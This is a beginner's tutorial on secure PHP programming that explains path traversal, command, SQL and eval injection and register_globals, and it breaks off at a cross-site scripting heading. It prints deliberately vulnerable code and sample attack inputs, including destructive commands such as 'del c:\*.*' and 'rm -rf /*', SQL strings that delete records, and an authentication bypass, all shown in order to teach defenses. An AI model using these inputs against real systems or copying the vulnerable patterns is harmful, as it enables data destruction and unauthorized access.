Secure Programming with PHP for Beginners

by Ulrich Speidel

PHP and other WWW scripting languages permit extensive functionality to be offered to users via the WWW interface. To prevent this functionality from being used to your or somebody else's disadvantage, it is important to avoid security holes right from the start. An important step in this direction is to avoid typical "beginners' mistakes". This article shows you a number of typical traps. You'll also learn how to recognize these (and similar) scenarios in advance and how to avoid them. We finish up with a collection of strategies that help you secure your site and keep it secure.

You have probably read or heard about it in the media: Once again someone has broken into the web server of a large company, organization or government authority. The unknown hackers (also known as "crackers") have defaced the web pages or have caused even worse damage. These are the spectacular cases. Unfortunately, break-ins into web servers are very common - in many cases, the victims never find out. Some examples:

The possibilities of causing damage are almost unlimited. However, one thing that isn't unlimited is the number of basic techniques that malicious hackers can use to gain access to your web server or database.

What computer programs are permitted to do - and what they mustn't do

OK, now you've embarked on your first cautious steps into the exciting realm of PHP programming. And I'm already telling you about all the things that could potentially go wrong. Shouldn't you possibly leave PHP programming to the experts? Don't panic - what you're about to read is useful, easy to digest and possibly news to your run-of-the-mill programmer friend.

At the risk of offending some of my esteemed colleagues: The majority of security holes in web sites can probably be attributed to experienced programmers. Compared to them, you have an advantage as a beginner: You're not set in your ways yet. What do I mean by that?

Quite simply: The vast majority of programmers (even those that learned their craft in the last few years) are trained to make computer programs "run". Once upon a time, when computers still worked away in splendid isolation, one thing had priority: Given a legal input, a program had to produce useful output as quickly as possible, using as little memory as possible.

Admittedly, it would have been pretty absurd if a user of a DOS PC had deliberately fed junk data to a program in order to have it spit out or modify data that was anyway under his control. Very few people burgle their own homes. If burglars have no way of getting to your home, then there's nothing wrong with leaving a window open. In other words, under weird input your standalone computer software was allowed to do things it wasn't intended for.

With the arrival of the Internet, this is a different ballpark though. Suddenly, the entire world can send data in arbitrary combination and quantity to your machine. If this data reaches one of your programs (e.g., a PHP script), you must be certain that the program will only undertake operations with it that you are happy with. If the data does not conform to your expectations, your program should at least be able to handle it safely. It could do so, e.g., by outputting an appropriate error message, by writing an appropriate log entry, or simply by cutting the connection to the troublemaker who has sent you all the rubbish. Let's establish our most important rule: An Internet program must not only do what it is intended for, but must also refrain from doing anything it was not intended for.

Seems obvious? Great. If you're finding the first part a little bit complicated, the second part may sound like an additional headache. However, it doesn't have to be that way: The first part gets considerably easier if you specify exactly what your program may do under which circumstances. In other words: Together with the security holes, the bugs often disappear, too.

A Simple Example

You have a web site with a form that contains a select list. Via this list, your users can select a month, i.e., an integer number between 1 and 12. When the form is submitted, this number is passed to your script - STOP!

Why have I just shouted "STOP!"? Because it's the program flow we expect: A user completes our form and submits it to our script. So far, so good. That's the way it's meant to be. However, what about the unanticipated?

Let's have a look at the <form> tag of your form.

...
<form method="post" action="myScript.php">
...

This says that your form will be sent to a script called myScript.php when it's submitted. The script is located in the same directory on the web server as the form being shown. Now, what stops us from writing the tag as follows:

...
<form method="post" action="http://www.hacking-target.com/theirScript.php">
...

That sends the data to a different script on the Internet. Now you may ask why you should want to send your carefully collected data to someone else who probably can't make any sense of it. Good question. You can answer it yourself. Let me continue with a counter-question: If we can send our data to other people's scripts, then what's there to keep other people from writing forms that let them send data to our script myScript.php?

The answer: There's no way to stop them. And that's the problem: We can no longer simply assume that the data that is passed to our script under the variable name of the select list does in fact originate from our list. If a hacker wants it to be that way, the data could be arbitrary. In other words: Apart from numbers, our script myScript.php must also be able to cope with arbitrary other strings.

Putting it on a more general footing: No matter whether your form element is a select list, a checkbox, a text input field or a radio button - the script that receives the form data only receives the (freely chosen) name of the element and the associated value. This value may always be an arbitrary string.
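For the month list, "coping" could look like the following minimal sketch, which accepts the integers 1 to 12 and rejects everything else. The function name parse_month() is made up for this illustration; filter_var() and FILTER_VALIDATE_INT belong to PHP's filter extension, which is assumed to be enabled.

```php
<?php
// Hypothetical helper: returns the month as an integer between 1 and 12,
// or null if the submitted value is anything else.
function parse_month($raw)
{
    // A field named "month[]" would arrive as an array: never valid here.
    if (!is_string($raw)) {
        return null;
    }
    $month = filter_var($raw, FILTER_VALIDATE_INT, array(
        "options" => array("min_range" => 1, "max_range" => 12),
    ));
    // filter_var() returns false if the value is not an integer in range.
    return ($month === false) ? null : $month;
}
```

A script would call parse_month() on the submitted value and stop with an error message if the result is null.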

How Can a Hacker Exploit This? Three Examples

To turn your script into a kind of "zombie" using specially crafted form data, the hacker must exploit functionality that is already present in your script, e.g.:

Let's have a look at a few examples to illustrate this:

Example 1: Unauthorized access to files

Let's have a look at a little greeting card script. I'll give you a little HTML form with the following input elements:

...
<form method="post" action="myGreetingScript.php">
<p>
Enter your first name here:
<input type="text" name="sender">
</p>
<p>
Enter the e-mail address of the person that you would like to greet:
<input type="text" name="addressee">
</p>
<p>
Enter your greeting message here:
<textarea rows="10" cols="60" name="message"></textarea>
</p>
<p>
<input type="submit" value="Send greeting">
</p>
</form>
...

I've left out the rest of the HTML code in order to keep things readable. If you load this page into your browser, you'll get a text input field for your first name, one for the addressee's e-mail address (so he or she can be notified by e-mail) as well as a field where you can enter the actual message. You'll also see a button that lets you send off the electronic postcard. Simple, isn't it?

So far, we haven't made any mistakes - remember, we need some functionality in the script in order to wreak havoc. Let's have a look at excerpts from the associated PHP script myGreetingScript.php:

...
// Save the message as an HTML file in a subdirectory called
// "greetings" of our web site. The file name is the first name of the sender,
// which we get from the browser via $_POST["sender"].
// First, we open the file:
$fp = fopen ("/path/to/our/site/greetings/".$_POST["sender"].".html", "w");
// Then we wrap the message in a little bit of HTML
$message="<html><body>".$_POST["message"]."</body></html>";
// ...and write it to the file:
fwrite($fp,$message);
// Now we're sending an e-mail to the addressee to notify him/her of the
// greeting message. This e-mail contains a URL that points at the file
// (the greeting message) that we have just written.
// After the e-mail, we'll also output a confirmation to the sender.
// None of this is shown here though as the damage has already been done!
...

Once again we've left out a lot here and will instead concentrate on the sore points. How can we get the script to do something that the owner didn't expect it to do? Now, let's plot: The site will most likely have a start page (index page). Your browser will tell you what the respective file is called, e.g., index.html. A "real" card greeting will reveal that index.html is located in the directory above the one that stores the greeting data. You only need to compare the URL of the start page with that of the greeting card (in the e-mail). OK, now consider what happens if the user enters

../index

as the sender's first name. Did you guess right? The file that we're now opening for writing is the file with the path:

/path/to/our/site/greetings/../index.html

However, that's the same as:

/path/to/our/site/index.html

As a result, we have managed to overwrite the site's start page, using the content which we specified in the textarea. How could the site's programmer have prevented this? Very simple: He could have removed all special characters from the sender name before using it as a file name. Even better, he could have used a unique file name generated by the script rather than the user, like so:

...
$filename = "/path/to/our/site/greetings/".uniqid("").".html";
$fp = fopen ($filename, "w");
...

In this case, it would have been appropriate to consider what exactly might be contained in our variable $_POST["sender"] and how it might be used. As a matter of principle, it is a bad idea to use browser-supplied variables in file names or in external commands (commands that are invoked via the command line of the server or the database). Watch carefully what might go into include(), include_once(), require(), require_once(), file(), readfile(), file_get_contents(), file_put_contents(), and other commands that read or write files. In most cases, using browser-supplied data there isn't necessary anyway. The next example shows how an external command can be used with malicious intent.
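If the sender's name really has to appear in the file name, the "remove all special characters" idea can be turned into a strict check. The following is only a sketch: the function name greeting_path() and the limit of 30 letters are assumptions made for this illustration.

```php
<?php
// Hypothetical helper: builds the path of a greeting file from a sender
// name, or returns null if the name contains anything but ASCII letters.
function greeting_path($baseDir, $sender)
{
    // 1 to 30 letters only: no dots, slashes or backslashes, so the
    // resulting path cannot point outside of $baseDir.
    if (!is_string($sender) || !preg_match('/^[A-Za-z]{1,30}\z/', $sender)) {
        return null;
    }
    return $baseDir . "/" . $sender . ".html";
}
```

Two senders with the same first name would still overwrite each other's greeting, which is one more reason to prefer a file name generated by the script.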

Example 2: Code-Injection into the command line

The second "technique" that I'd like to warn you about follows the same lines as the first, but it's potentially even more dangerous. In this example, we're not only mixing parts of file names into our input data, but are even executing commands on the server. The scenario: You have written/purchased/borrowed/stolen a little command line program called horoscope that outputs a horoscope if you hand it a date as command line parameters. Under Windows, that'd work as follows for October 7, 1965:

C:\Program Files\SuperHoroscope>horoscope.exe 7 10 1965
Not all days are as eventful as today, ...

You now want to make the output of this program available via the web. So you write a little form that lets the user choose day, month and year via three select lists. The lists are called "day", "month" and "year", respectively. Since you already know that these don't absolutely have to be select lists, as any hacker worth his salt can just create an arbitrary form for hacking purposes, we'll dump the form and look straight at the code of misconduct:

...
$day=$_POST["day"]; $month=$_POST["month"]; $year=$_POST["year"];
system("C:/Program Files/SuperHoroscope/horoscope.exe $day $month $year");
...

Once again, our script works as a shining example. If you're using the intended form, you get your horoscope. However, if you use a form with the following hidden input field:

...
<input type="hidden" name="day" value="11 9 2001; del c:\*.*;">
...

then there'll be about as much left of the server's file system as there was left of the twin towers. The first unprotected variable was sufficient not only to submit all parameters for a successful execution of horoscope.exe, but also to submit a semicolon as a command separator and to "inject" a subsequent delete command. (The semicolon is the separator in Unix shells; the Windows command interpreter uses an ampersand, &, for the same purpose.) The other variables may be left empty or may be filled with arbitrary values. In order to protect yourself against such attacks, you definitely don't need an army, though. You could have simply ensured that your variables only contain numbers that represent a day, month, or year, respectively. In the case of deviating data, you could have aborted your script with an error message. Alternatively, there's also the PHP function escapeshellarg(). It places each parameter inside quotes and defuses any quote characters that the parameter itself contains, so that the shell treats the whole value as a single argument:

...
$day=escapeshellarg($_POST["day"]);
$month=escapeshellarg($_POST["month"]);
$year=escapeshellarg($_POST["year"]);
...

However, in this case horoscope.exe must be able to cope with potentially inconsistent parameters, which may still represent a security risk. An input check would definitely be the best choice here.
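Such an input check could be sketched as follows. The function name horoscope_command() is made up for this illustration; checkdate() and escapeshellarg() are standard PHP functions. The sketch only builds the command line and leaves the call to system() to the script.

```php
<?php
// Hypothetical helper: returns the command line for horoscope.exe, or
// null if the three values do not form a valid calendar date.
function horoscope_command($day, $month, $year)
{
    foreach (array($day, $month, $year) as $value) {
        // Each value must be a string of 1 to 4 digits and nothing else.
        if (!is_string($value) || !preg_match('/^\d{1,4}\z/', $value)) {
            return null;
        }
    }
    // checkdate() expects month, day and year (in this order) as integers.
    if (!checkdate((int)$month, (int)$day, (int)$year)) {
        return null;
    }
    // The program path contains a space, so it is quoted as well.
    return escapeshellarg("C:/Program Files/SuperHoroscope/horoscope.exe")
        . " " . (int)$day . " " . (int)$month . " " . (int)$year;
}
```

Because only integers ever reach the command line, horoscope.exe no longer has to cope with inconsistent parameters.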

Example 3: SQL code injection

The third trick that I would like to introduce you to here is once again a variant of the two previous security holes. In this case, we're exploiting the PHP interface to our database in order to gain access to a system. Let's suppose that you store the access data for an Internet banking system in a table called accounts in your database. The table has two columns (fields) and in each row, we find the record for a particular account:

AccountNumber AccountPassword
145054 9nd3qw1y
873221 abcd1234
... ...
548745 2afje9r
... ...

Many databases let you access this kind of table using a language known as SQL (perhaps you already know SQL? Great!). An SQL command that lets us, say, retrieve the record for account number 873221 and password abcd1234, looks like this:

select * from accounts where AccountNumber = 873221 and AccountPassword = "abcd1234"

Suppose you're showing your users a login page that lets them log into your system using their account number and password. Then you'll be able to compose the SQL command in your PHP script as follows:

...
$sqlCommand = "select * from accounts where AccountNumber = "
. $_POST["accountnumber"]
. " and AccountPassword = \""
. $_POST["accountpassword"]."\"";
...

For account number 873221 and the password abcd1234 you'll get exactly the same SQL command as above, except that it's neatly tucked away in a PHP string. This is easily digested by the various query functions in PHP that hand on your command to the desired database.

You can crack such a script even without a special form. In order to get unauthorized access to the account with, say, number 548745, you may even leave the password field empty altogether. Instead, you enter the following string as the account number:

548745 or AccountNumber = 0 

That makes your SQL command look like this:

select * from accounts where AccountNumber = 548745 or AccountNumber = 0 and AccountPassword = ""

In other words: The database will return all records that match at least one of the two following conditions:

  1. The account number is 548745
  2. The account number is 0 and the account password is empty (we could of course specify any other account number here)

The second condition is probably hard to satisfy, but the first one is trivial, at least as long as there is an account with number 548745. Whatever, we're now free to use the account as we wish. Similar tricks may permit you to change account balances, fake transactions, set up accounts, etc.

By the way: We were rather benign here - some databases would have cooperated with the following input as well:

548745;
delete from accounts where AccountNumber = 643894;
select * from accounts where AccountNumber =

That way, not only would we be able to access someone else's account, we'd also be able to let our boss (whose salary account number 643894 we've managed to get from someone in Finance over a beer) go insolvent without a trace.

The trick I've just shown you is easily thwarted by putting quotes around the value you're comparing against in your SQL command, i.e.:

...
$sqlCommand = "select * from accounts where AccountNumber = \""
. $_POST["accountnumber"]
. "\" and AccountPassword = \""
. $_POST["accountpassword"]."\"";
...

This would turn our malicious input into a non-existent account number. If you think that this is a little naive, you're not entirely wrong. Firstly: Can we really treat each number as if it was a string? Secondly: What keeps a hacker from entering quotes himself and thus from subverting our security measures? Good questions.

The answer to the first question is: "Not always, but often". If the submitted value must be a number (e.g., in a larger-than or smaller-than comparison), we'll have to check explicitly beforehand whether we've really been given a number.
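An explicit check of this kind could be sketched as follows. The function name parse_account_number() and the limit of nine digits are assumptions made for this illustration; ctype_digit() is part of PHP's ctype extension, which is assumed to be enabled.

```php
<?php
// Hypothetical helper: returns the account number as an integer, or
// null if the submitted value is not a plain string of digits.
function parse_account_number($raw)
{
    // ctype_digit() is true only for non-empty strings made up of 0-9.
    if (!is_string($raw) || !ctype_digit($raw) || strlen($raw) > 9) {
        return null;
    }
    return (int)$raw;
}
```

Since the result is either null or an integer, it can go into a numerical comparison in an SQL command without carrying any SQL syntax along.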

The answer to the second question depends on your PHP configuration. The important bit here is a configuration setting named magic_quotes_gpc in the configuration file php.ini. It determines whether (single or double) quotes submitted by the browser should be escaped by a preceding backslash. What does this mean? Simple: Imagine that you have a form with a text input field called "dish" that takes the name of a dish. The processing script could - in the simplest case - just echo the specified dish name back to the user:

...
echo $_POST["dish"];
...

If you have kept the default setting of magic_quotes_gpc in php.ini, i.e., it's On, the input

Spaghetti "Bolognese" with parmesan cheese

won't return the original, but

Spaghetti \"Bolognese\" with parmesan cheese

instead. In many cases, though, web programmers or system administrators consider this to be a nuisance and simply turn magic_quotes_gpc off. In this case, our quotes are a fruitless security precaution. The hacker could simply enter

548745";
delete from accounts where AccountNumber = 643894;
select * from accounts where AccountNumber = "

That would put us back to square one. If, however, magic_quotes_gpc is still On we're home and hosed - the hacker's quotes have been defused by the backslashes.

How do you check whether magic_quotes_gpc is set to On? If you have installed your own server, you can look it up in php.ini. If you have no control over the server configuration, you can simulate the effect of magic_quotes_gpc On by entering the following code snippet at the beginning of your script

...
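$get_safe = $_GET;
$post_safe = $_POST;
$cookie_safe = $_COOKIE;
// get_magic_quotes_gpc() no longer exists in PHP 8, where nothing is escaped
// automatically, so a missing function is treated like the setting Off
if (!function_exists("get_magic_quotes_gpc") || !get_magic_quotes_gpc()) {
    // add backslashes to browser variables
    foreach ($_GET as $key => $value) {
        $get_safe[$key] = addslashes($value);
    }
    foreach ($_POST as $key => $value) {
        $post_safe[$key] = addslashes($value);
    }
    foreach ($_COOKIE as $key => $value) {
        $cookie_safe[$key] = addslashes($value);
    }
}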
...

and by using the "defused" variables $get_safe, $post_safe, and $cookie_safe instead of $_GET, $_POST and $_COOKIE.
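Escaping quotes is not the only way to keep submitted data out of the SQL syntax, and on current PHP versions it cannot be left to the configuration: magic_quotes_gpc was removed in PHP 5.4. A commonly used alternative is a prepared statement, in which the query contains placeholders and the values are handed to the database separately. The following is a minimal sketch only, assuming that the PDO extension and its SQLite driver are installed; the function name find_account() and the in-memory demonstration database are made up for this illustration.

```php
<?php
// Hypothetical helper: looks up an account with a prepared statement.
// Returns the matching row as an array, or null if there is none.
function find_account(PDO $db, $number, $password)
{
    $stmt = $db->prepare(
        "select * from accounts where AccountNumber = ? and AccountPassword = ?"
    );
    // The values travel separately from the SQL text, so quotes or SQL
    // keywords inside them are treated as data only.
    $stmt->execute(array($number, $password));
    $row = $stmt->fetch(PDO::FETCH_ASSOC);
    return ($row === false) ? null : $row;
}

// Demonstration with a throwaway in-memory SQLite database (an assumption).
$db = new PDO("sqlite::memory:");
$db->setAttribute(PDO::ATTR_ERRMODE, PDO::ERRMODE_EXCEPTION);
$db->exec("create table accounts (AccountNumber integer, AccountPassword text)");
$db->exec("insert into accounts values (548745, '2afje9r')");
```

With this approach, the malicious account number from the example is simply compared against the AccountNumber column as one odd-looking value.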

Taking stock

Well, you now know the more common trickery. As you have probably noticed, all three examples have always used the same fatal combination:

  1. form variables submitted by the browser that contained unexpected strings
  2. a function that executes programs outside of PHP or that reads or modifies data or files

Neither of these two ingredients can be entirely avoided with ease. However, you can ensure that submitted data either matches the format that you expect, or that the data is made safe before it is passed to the function involved. The next section demonstrates how this can be done.

Checking or defusing input data

You've already had a sneak preview of defusing browser-supplied data: Before passing values to the command line, you can quarantine them electronically with escapeshellarg(). Before insertion into SQL query strings, you can often take the bite out of dangerous quotes and apostrophes via addslashes() or magic_quotes_gpc On. Sometimes, though, defusing isn't an option. That's the case, e.g., if your command line code doesn't like quotes or if it might behave insecurely under incorrect input, or if you have to compare numerical amounts in SQL. In these cases, only an explicit check will help. Such a check may be a good idea in any case, e.g., because you want to log break-in attempts in a log file, or because you would like to give the user feedback about erroneous (but harmless) input.

Checking browser-submitted data

In principle, you have the choice between two strategies here. The first strategy consists of defining exactly what values a certain input field may contain. If you would like to see a New Zealand postal code, for example, the input should consist of exactly four digits. In the case of an input that has to be from a clearly defined set (such as "January", "February", "March",...), e.g., from a select list or a set of radio buttons, you can check directly whether the input corresponds to one of the values in the set. If you are able to apply this strategy, then that's great - it ensures that you're really only processing values that you expected in the first place.

The downside of the first strategy is that it's sometimes a bit difficult to define exactly what is to be permitted. If you are asking for a surname, for example, "d'Artagnan" should probably pass, while "x'utwfrt" is probably not to be found in anyone's passport and would thus have to be regarded as suspect. As a result, you may have to loosen up and be prepared to accept junk data as long as it's harmless. In the case of a name, you might want to demand that it may contain apostrophes, but no double quotes, semicolons or other funny characters. This loosening may open back doors, though: Apostrophes, for example, may serve as replacements for double quotes in SQL commands. Thus, you need to make sure that things that can contain apostrophes don't turn up unprotected in an SQL statement.

The second strategy is to search explicitly for forbidden characters. E.g., in order to subvert the SQL command in the previous example (value packaged inside ""), we need a double quote, come what may. Thus it is sufficient to check our string explicitly for the presence of such a (double quote) character. The disadvantage of this strategy is that there may be more than one "problematic" character. This is in particular the case when the string is eventually going to be part of something that's passed to the command line, where - depending on the shell - there are several characters that act as syntax rather than data. You could end up chasing your tail.

So, how do we implement the two strategies? The magic word here is regular expressions.

Regular Expressions

Doesn't ring a bell? No worries - we'll explain them right now. In PHP, there are two kinds of regular expressions. The one kind (POSIX compatible) is only intended for people who have been using them for years and don't want to let go. If you're a beginner in regular expressions, feel free to forget about that kind and plunge head-on into the second variety, the Perl-compatible regular expressions. All functions in PHP that deal with Perl-compatible regular expressions start with preg_ . The most important function is preg_match(). You hand it a pattern (the regular expression) and a string, and it'll tell you whether the pattern matches the string.

Example: Your form variable postcode is supposed to contain a post code. In New Zealand, that's a four-digit number. In PHP, we can intercept corrupt post codes as follows:

...
if (!preg_match("/^\d{4}$/",$_POST["postcode"])) {
die("This letter won't get there, ever!");
}
...

OK, if you've been to my lectures, read my book (in German), or have learned it in some other way, then you'll know the trick: The pattern /^\d{4}$/ consists of two characters known as "delimiters" (the slashes), the anchor ^ that determines that the pattern must match at the beginning of the string and the anchor $ that extends it all the way to the end of the string. Between those two anchors, we want to find digits (\d). To be precise, we want four of them and since \d\d\d\d looks a bit tacky, we use a multiplier ({4}).

If the pattern matches, preg_match() returns 1, which PHP treats as true and which we negate to false by putting an exclamation mark in front of the function. In this case, our variable has sailed around the reef. If the pattern doesn't match, we let the script die with an error message. Admittedly, you could use a page with more frills for that, but that isn't the point here. So much for strategy 1.

If we don't give a hoot about the content of the form variable postcode as long as it doesn't contain any double quotes, we can do it like this:

...
if (preg_match("/\"/",$_POST["postcode"])) {
die("This letter won't get there, ever!");
}
...

In this case, we'll set off the alarm if there is a double quote anywhere (=no anchors) in our string. Since the double quote in the pattern is located between two double quotes of the PHP syntax, we have to protect it with a backslash. This time, a positive result is a reason for worry, so we don't need an exclamation mark in front of  preg_match().

Now that you know how to do the interception, all you need is a suitable regular expression for your input data, right? The following table shows a few useful expressions:

Use for                                                                          Pattern
A string that must only contain letters                                          /^[^\W_\d]*$/
A non-empty string that must only contain letters                                /^[^\W_\d]+$/
A string that must only contain letters and that has to start with, e.g., hello  /^hello[^\W_\d]*$/
A string that contains a non-personalized New Zealand car license plate          /^([A-Z]{2}\d{1,4}|[A-Z]{3}\d{1,3})$/
A string that contains an e-mail address                                         /^\w[\w\-\+\&\.]*@([A-Za-z][A-Za-z0-9\-]{0,23}\.)*[A-Za-z]{2,}$/
Of course there are many more patterns - which you'll be able to construct yourself with a bit of practice. As always, getting your hands dirty is the best way to learn. The following little PHP script lets you carry out your own experiments:

<html>
<body>
<?php

// replace the expression below by the pattern that you
// would like to try out
$pattern = "/^\d{4,6}$/"; // Example: a string that consists of 4-6 digits
// test string that should match the pattern (or not):
$test = "12345"; // should match
if (preg_match($pattern,$test)) {
    echo "The pattern ".htmlspecialchars($pattern)." matches ".htmlspecialchars($test);
}
else
{
    echo "The pattern ".htmlspecialchars($pattern)." does not match ".htmlspecialchars($test);
}
?>
</body>
</html>

More information on regular expressions is available from a whole raft of sources - try this article. I learnt my basics a while ago using Learning Perl. As the Perl syntax for regular expressions is the same as in PHP, you can generally  use the expressions there without much of a change. Programming PHP also has an extended chapter on regular expressions, but treats the POSIX variety first, so you may have to turn a few more pages.

Filtering fixed values with switch-case

This filtering method is suited in particular for data that you expect from select lists or radio buttons. This limits the number of possible values from the start. Filter as follows:

...
$dayofweek = $_POST["dayofweek"];
switch($dayofweek) {
    case "Monday": break;
    case "Tuesday": break;
    case "Wednesday": break;
    case "Thursday": break;
    case "Friday": break;
    case "Saturday": break;
    case "Sunday": break;
    default:
        die("Go try your luck elsewhere!");
}
...
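For longer lists of values, the same filter can be written more compactly with in_array(). This is a sketch of an alternative, not a replacement for the switch statement; the function name is_valid_day() is made up for this illustration.

```php
<?php
// Hypothetical helper: true only if $value is one of the seven day names.
function is_valid_day($value)
{
    $allowed = array("Monday", "Tuesday", "Wednesday", "Thursday",
                     "Friday", "Saturday", "Sunday");
    // The third argument (true) makes in_array() compare type and value,
    // so only a string identical to one of the names passes.
    return in_array($value, $allowed, true);
}
```

A script would call die() or show an error page whenever is_valid_day() returns false.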

Anything else?

Of course! So far we've only worried about how you're going to guide your user-supplied data safely through your first script. However, there are still a few back doors we need to know and shut.

Data from databases

If you're receiving data from your users and are storing it in a database, you'll now be aware that you need to protect yourself against SQL code injection, and you'll know how to do that. However, once the data has reached the database, the job isn't over. Sooner or later you'll have to dig the data back out again. At that point, you'll have to ask yourself which values your database fields may have assumed as a result of the user input and whether they can still cause any damage.

If you have already subjected the data to restrictive filtering, the risk may not be that high. If you've relied on magic_quotes_gpc, you'll need to be a bit careful. This is because the backslashes that protect your data will be lost as the data is written to the database. If you have kept the default setting for yet another PHP configuration setting, called magic_quotes_runtime, you'll get a string without backslash escapes when you're reading from the database. If you then want to process this data further in one of the "risky" contexts that we have discussed, you have (once again) a problem. However - you know the solution: addslashes() or renewed filtering and/or packaging, depending on the intended use of the data.

File uploads

This is a touchy topic - even the PHP developers were struggling with this one, as is evidenced by the security updates during 2002. Buffer overflows in PHP aside (we've hopefully seen the last of them), there are in principle two possible sources of danger here: the overwriting of existing files (if the user is able to influence the file name - as in our first example) and the clandestine upload of executable files to the server.

The latter is a problem if you wish to make the uploaded files available to the user, such as in photo album applications, shareware uploads, etc. (cf. the donor photo in our lecture example). In this case, you'll have to reveal to the user's browser where - and under which name - the file may be found on the server. If the uploaded file is a PHP file, the user can then request it from the web server, which will execute it, so the user gets to pick what he or she wants to do on your server. A system(), exec(), passthru() or shell_exec() call in this file is able to do anything that a user with the privileges of the web server may do on the server machine: modify files, start or terminate programs, ... Not a good idea? I think you understand.
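One way to address both dangers is to let the script choose the stored file name and to accept only a short list of harmless extensions. The following is a sketch under assumptions: the function name stored_upload_name() and the list of picture extensions are made up for this illustration, and an extension check alone does not prove that the file really contains a picture.

```php
<?php
// Hypothetical helper: picks the name under which an uploaded picture is
// stored. Returns null unless the original name ends in an allowed extension.
function stored_upload_name($originalName)
{
    $allowed = array("jpg", "jpeg", "png", "gif");
    if (!is_string($originalName)) {
        return null;
    }
    // pathinfo() yields the part after the last dot ("" if there is none).
    $extension = strtolower(pathinfo($originalName, PATHINFO_EXTENSION));
    if (!in_array($extension, $allowed, true)) {
        return null;
    }
    // The script, not the user, chooses the name; only the extension is kept.
    return uniqid("") . "." . $extension;
}
```

A file called shell.php is rejected outright, and a file called Holiday.JPG ends up under a generated name that the user cannot influence.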

The eval() function and variable variables

The eval() function or an equivalent to it is found in many programming languages - including PHP. You pass it a string with PHP code, which is then executed by eval(). Here, for example, we try to call the correct function via eval():
...
function circle_area($radius) {
return pi() * $radius * $radius;
}

function square_area($length_of_side) {
return $length_of_side * $length_of_side;
}
...
$size = $_POST["size"];
$shape_type = $_POST["shape_type"]; // should be "circle" or "square"
eval("echo ".$shape_type."_area(".$size.");");
...
This can be quite useful under certain circumstances. However, avoid incorporating data into such a string if the data has been supplied by a user via the browser. In our case, you might fall victim to an unusual "shape type". The value circle_area(1); exec('rm -rf /*'); // (whose trailing // turns the rest of the generated code into a comment) could ruin a few things on your Unix machine.
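The same choice between functions can be made without eval() by looking the shape type up in a fixed list. This is a sketch of one possible alternative; the helper name shape_area() is made up for this illustration, and the two area functions are repeated so that the example is complete.

```php
<?php
function circle_area($radius) {
    return pi() * $radius * $radius;
}

function square_area($length_of_side) {
    return $length_of_side * $length_of_side;
}

// Hypothetical helper: returns the area, or null for unexpected input.
function shape_area($shape_type, $size)
{
    // Fixed list of shape types and the functions that belong to them.
    $functions = array("circle" => "circle_area", "square" => "square_area");
    if (!is_string($shape_type) || !isset($functions[$shape_type])) {
        return null;
    }
    if (!is_numeric($size)) {
        return null;
    }
    // The function is called by name; no code string is ever built
    // from the submitted data.
    return call_user_func($functions[$shape_type], (float)$size);
}
```

Anything that is not literally "circle" or "square" never gets near a function call.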

A similar risk exists when you use variable names that you can set dynamically in PHP:

...
$price = 30;
$column = "price";
echo "The value of column $column is ".$$column; // 30
...

This can also get you into trouble, in particular if you publish your code. How's that? Consider the following script:

...
// daily prices of our wholesale butchery
$chickenbreast = 15;
$porkschnitzel = 12;
$beefrump = 10;
// password for wholesale customers
$password = "huge_rebate"; // this is top secret!
// password entered by the user (empty for normal customers)
$userpw = $_POST["password"];
// Product selected by the user via a select list (or so we hope)
// "chickenbreast", "porkschnitzel", "beefrump", ...
$product = $_POST["product"];
// calculate price
$price = $$product;
if ($userpw == $password) {
$price = $price * 0.7; // 30% rebate, highly confidential
}
// output to the user
echo $product." costs ".$price." per kg";
...

Of course, your competitor might want to know how much rebate your valued large-volume customers are getting. Since you've made your code available to the public (without prices and password, of course), generous as you are, your competitor may simply specify "password" as the product, using a homebrew HTML form. At that point, things turn to custard for you - your script "accidentally" exposes the wholesale password as a price, completely ignoring your wish to keep it secret. That permits your competitor to have a look at your discounts next time round.

Of course, that is only one possible way to shoot yourself in the foot using variable variables. Note that, once again, insufficiently checked user input came to the party!
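
One way to keep user input away from your variable names is to put the prices into an array and to look up only keys that actually exist in it. A minimal sketch, assuming the three products from the script above; lookup_price() is a hypothetical helper, not a PHP built-in:

```php
<?php
// Hypothetical helper: returns the price per kg, or null for an unknown product.
function lookup_price(array $prices, $product) {
    if (!is_string($product) || !array_key_exists($product, $prices)) {
        return null;
    }
    return $prices[$product];
}

// daily prices, kept apart from all other variables
$prices = array(
    "chickenbreast" => 15,
    "porkschnitzel" => 12,
    "beefrump"      => 10,
);
$password = "huge_rebate"; // no longer reachable via the product name

// Usage: $price = lookup_price($prices, $_POST["product"]);
// A null result means that the browser sent something we never offered.
```

With this layout, specifying "password" as the product yields no price at all, because the password is not part of the $prices array.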

Default values for variables

As you have probably spotted, PHP is made for easy use. Part of this is the fact that you don't have to assign initial values to variables, as you do in many other programming languages. In PHP, a variable that hasn't been assigned a value yet behaves like 0 when used as a number, like an empty string when used as a string, and like false when used as a Boolean value. Nice. Values passed by the browser are available from $_POST, $_GET, $_COOKIE and partially $_SERVER. That didn't stop the inventors of PHP from creating a shortcut. If you open the PHP configuration file php.ini and set the variable register_globals to On, you can write $phonenumber rather than $_POST["phonenumber"] (this applies to PHP versions before 5.4.0, which removed the setting). That isn't dangerous in itself, unless you're relying on a default value. Consider a script named myScript.php:
<?php
// $login and $password are supplied by the browser. A field called "superuser"
// doesn't exist in *our* browser form
if (($login == "superuser") && ($password == "ef9nw3c5")) {
    $superuser = true; // first mention of the variable in the code
}
if ($superuser) { // ought to be false unless we've logged in using
                  // the login "superuser" and the password "ef9nw3c5"
    // Code that only the superuser may execute goes here
    ...
}
else
{
    // Code for other mortals
    ...
}
...
?>

If you invoke this script as myScript.php?superuser=1, you don't need to know the superuser password! Why? Well, PHP regards all variables that aren't either empty or equal to 0 as true. In this case, PHP registers the GET variable supplied by the browser at the beginning of the script's execution as $superuser. This means that the second if-statement executes the superuser code!
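
The hole closes as soon as the script stops relying on a default value and reads its input from a defined place. The following sketch shows one possible shape for this. It assumes that the login form is submitted via POST, and is_superuser() is a name invented for this illustration:

```php
<?php
// Hypothetical helper: decides from the submitted form data
// whether we are dealing with the superuser.
function is_superuser(array $form) {
    $superuser = false; // defined starting value, no matter what the browser sends
    $login    = isset($form["login"]) ? $form["login"] : "";
    $password = isset($form["password"]) ? $form["password"] : "";
    if (($login === "superuser") && ($password === "ef9nw3c5")) {
        $superuser = true;
    }
    return $superuser;
}

// Usage: $superuser = is_superuser($_POST);
```

A request such as myScript.php?superuser=1 now has no effect, since the only way for $superuser to become true is the comparison inside the function.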

Cross-site scripting (XSS)

